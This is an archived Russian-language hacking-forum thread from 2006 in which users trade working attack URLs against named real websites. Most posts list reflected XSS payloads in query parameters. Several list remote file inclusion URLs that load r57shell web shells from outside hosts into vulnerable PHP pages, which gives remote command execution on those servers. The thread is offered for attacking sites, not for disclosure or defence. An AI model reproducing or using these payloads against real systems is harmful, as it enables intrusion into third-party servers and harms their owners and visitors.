PDA

Просмотр полной версии : Еще немного XSS дыр и php инекция


~Fenix~
28.03.2006, 08:52
XSS
http://thedjs.th.funpic.de/index.php?page=<script>alert()</script>
http://limousine-denver-airport.com/index.php?page=<script>alert()</script>
http://www.lz-menden.de/public/index.php?page=<script>alert()</script>
http://www.939.ch/index.php?page=<script>alert()</script>
http://www.salesmarbella.com/index.php?page=<script>alert()</script>
http://www.celebratinglifeministries.org/index.php?page=<script>alert()</script>
PHP инекция
http://iaald.org/cee/index.php?page=http://k1on.nm.ru/conf.php
шелл не мой.........свой еще незагрузил на сайт

CinerX
28.03.2006, 12:06
XSS
http://www.celebratinglifeministries.org/index.php?page=<script>alert()</script>

вот еще отуда же:
http://www.celebratinglifeministries.org/index.php?gallery=<script>alert(/XSS_ta_zhe_hernja/)</script>
http://www.celebratinglifeministries.org/index.php?page=NEWS.php&template=<script>alert(/Vot_takaja_fignja/)</script>

ZINGER
28.03.2006, 12:17
ну зачем выкладывать хсс? они есть в 90 % инета... почти на каждом сайте

CinerX
28.03.2006, 14:49
Оки вот иньекция отсюда:
XSS
http://www.salesmarbella.com/index.php?page=<script>alert()</script>
Хм... Сегодня была =(( И NEWS.php стал news.php ну да ладно хрен сним... Так даже проще =)
вот другой инклюд отуда же:
http://www.salesmarbella.com/index.php?page=http://mail.ru

пс так ведь раздел также XSS посвящен =)

Gang100
28.03.2006, 17:33
http://www.szs.bierun.pl/index.php?menu=http://rst.void.ru/download/r57shell.txt
http://www.sasl-lucerne.ch/web/index.php?M=http://rst.void.ru/download/r57shell.txt
http://www.hofstrafma.com/index.php?main=http://rst.void.ru/download/r57shell.txt
http://www.more-ohr-less.at/index.php?m=http://rst.void.ru/download/r57shell.txt

~Fenix~
29.03.2006, 08:44
вот еще немного
http://hilde.kristina-gebhardt.de/muphel/index.php?a=http://hack-viyu.h16.ru/r57shell.txt
http://www.rockonnet.com/rock-mladim/index.php?a=http://hack-viyu.h16.ru/r57shell.txt